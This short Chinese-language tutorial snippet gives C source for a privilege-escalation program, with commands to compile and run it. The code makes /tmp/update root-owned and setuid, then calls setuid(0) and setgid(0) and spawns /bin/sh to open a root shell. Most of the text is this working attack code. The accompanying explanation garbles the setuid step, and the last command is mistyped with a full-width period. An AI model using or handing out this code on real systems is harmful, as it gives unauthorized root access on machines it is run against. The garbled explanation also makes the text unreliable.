1、编写.c提权脚本
♾️ abap 代码:#include<unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}
这是一段C语言程序的代码,它会将/tmp/update文件的所有者和组更改为root,设置setuid和setgid位为0,然后执行/bin/sh。这段代码的目的是使用/tmp/update文件实现以root权限运行shell的目的。
2、使用gcc编译运行
♾️ abap 代码:gcc shell.c -o /tmp/update
执行gcc编译好的文件
♾️ abap 代码:。/update